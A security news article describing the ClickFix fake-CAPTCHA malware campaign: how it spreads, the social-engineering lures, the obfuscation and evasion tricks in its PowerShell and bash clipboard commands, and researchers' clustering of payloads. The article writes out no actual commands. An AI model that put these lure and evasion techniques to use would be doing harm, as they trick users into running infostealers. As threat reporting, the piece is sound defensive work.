Fake CAPTCHA Used in New ClickFix Attack to Deploy Malware Payload

ClickFix, which began as a red-team simulation tool in September 2024, has quickly developed into a widespread malware delivery system that outcompetes its predecessors, such as the ClearFake phony browser update fraud.

Initially demonstrated by security researcher John Hammond for educational purposes, this fake CAPTCHA technique tricks users into executing malicious PowerShell commands via clipboard manipulation, bypassing traditional file downloads.

By late 2024, ProofPoint dubbed it ClickFix, highlighting its shift from EtherHiding tactics hiding code in Ethereum smart contracts to more insidious social engineering.

This “CAPTCHAgeddon” variant leverages trusted infrastructure, enabling drive-by infections and spear-phishing, resulting in widespread deployment of infostealers like Lumma, which exfiltrate credentials and data seamlessly.

Evasion Tactics Driving Infections

ClickFix’s propagation has diversified from malvertising on shady networks targeting streaming and software sites to infiltrating compromised WordPress platforms with high SEO rankings, where fake CAPTCHAs overlay legitimate content, triggered by user interactions for natural integration.

According to the report, attackers further exploit social media, GitHub repositories with deceptive READMEs, and SEO-optimized bait sites featuring blurred scraped articles, compelling users to “verify” for access.

Narratively, these attacks employ sophisticated social engineering, mimicking reCAPTCHA or Cloudflare challenges with dynamic branding pulling site logos via AdZone IDs and urgent prompts like “suspicious IP detected,” enhancing persuasion.

In targeted phishing, such as Booking.com impersonations, they redirect from branded pages to themed CAPTCHAs, installing stealers for comprehensive data harvesting rather than single credentials.

Technically, evasion revolves around obfuscated PowerShell commands using casing mutations (e.g., PoWeRsHeLL), ASCII tricks, and dynamic script loading from attacker servers, evading static scanners.

Payloads embed in legitimate-looking files like socket.io.min.js on mimic CDNs, or abuse Google Scripts for trusted-domain hosting, reducing suspicion and bypassing filters.

Cross-platform adaptations extend to macOS and Linux via bash scripts, instructing users to paste commands into terminals, exploiting non-technical users’ unfamiliarity.

By mid-2025, these methods have widened the attack surface, with de-obfuscated examples revealing simple curl invocations fetching remote payloads.

Clustering Reveals Attacker Ecosystems

To dissect this threat landscape, researchers at Guardio applied DBSCAN clustering on thousands of clipboard payloads, extracting features like domain entropy, obfuscation patterns, and command structures.

This unsupervised approach identified distinct clusters, such as Cluster 16’s uniform, non-obfuscated PowerShell fetches from .run/.press TLDs with UUID paths, indicating shared toolkits.

Other clusters show heavy obfuscation or cross-platform hybrids, mapping attacker profiles for proactive blocking.

This evolution underscores a viral mutation in cyber threats, displacing older strains through superior infectiousness. Defenders must prioritize behavioral analytics over signatures, as tools like FileFix hint at further adaptations.

Indicators of Compromise (IOCs)

The Ultimate SOC-as-a-Service Pricing Guide for 2025– Download for Free